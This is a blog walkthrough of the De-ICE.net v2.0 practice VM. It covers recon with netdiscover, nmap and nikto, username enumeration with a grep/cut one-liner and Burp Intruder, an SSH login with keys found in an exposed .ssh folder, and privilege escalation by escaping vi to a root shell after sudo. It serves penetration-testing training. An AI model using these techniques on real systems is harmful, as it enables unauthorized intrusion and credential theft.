Walkthrough for De-ICE.net v2.0

I am glad to have completed the De-Ice challenge though i needed to take a few referenced , but hey it was a good start .

Lets cut the chase and get to work .

What is De-ICE ?

The answer to that question is Here.To download a copy of the live OS .

de-ice.net-2.100-1.0.iso

 

Walkthrough

I have used Kali linux for the purpose of this walk through.First of all i used the netdiscover command in kali to discover the IP address of De-ICE.

netdiscover

The IP’s to be discovered were 192.168.2.100 and 192.168.2.101

I ran an nmap scan on the targets .

nmap scan

Since its a walkthrough i am going to cut the i did this i did that and i’m just gonna stick with the next step.

I visited the web app on port 80 of 192.168.2.100 and found this list of email ids . ( Shortlisted them since they could be user ids for login )

browse page

I wrote a simple script command that extracts all the usernames from this page ..

username ennumeeration

Here is the code :

cat index2.html | grep @ |cut -d "-" -f2|cut -d "@" -f1 > username.txt

This gave me a list of all the usernames i think could be listed in the possibility.

Then i tried many possibilities on 192.168.2.100 but did not get any good output .

However 192.168.2.101 was interesting . i ran a nikto scan on it and found the following result .

nikto scan

It talks about DIrectory indexing on /~root/ and /root/ . so i thought that the username list could be used to enumerate in this scenario. like /~(username)/

directory indexing

 

I quickly edited the username file and appended ~ before every name available in the text file and . Passed it as a parameter in Burp Intruder .

burpsuite

That paid off i got a 200 message for a few Usernames..

burpsuite detection of pirrip

Based on this It was time for another nikto scan to crawl and find things under these Directories . /~havisham/ , /~pirrip/ and /~magwitch/.So cutting the chase here is the one for /~pirrip/

ssh detection pirrip

A ssh folder was detected in nikto . Bingo that had the rsa private and public key for the server.

ssh page
downloaded them and gave permissions and moved them to the /root/.ssh/ folder of my system and then did an ssh .

ssh to pirrip

Browsing through the mail of the logged in server i figured out there was a password for pirrip.

random browsing

0l1v3rTw1st nice password eh .

Soon i used this to sudo login to see the permissions of the user .

checking permissions

so we can see here vi, cat, tail and more . Here however cat did not allow me to view the shadow file . but vi does allow me to open the shadow file .

bin bash

You can now crack the passwords or even change the hash to the ones you know . but this is the trick that i learnt from other blogs . .since we have opened the vi in root we are root . and there fore check the command i entered instead of saving the file . i invoked a bash and guess what just happened .

root

Wohoo Root it is .

We have successfully cracked the Vulnerable OS .

I will be pasting the entire line of code in a day or two thats it for now will upload a video soon as well !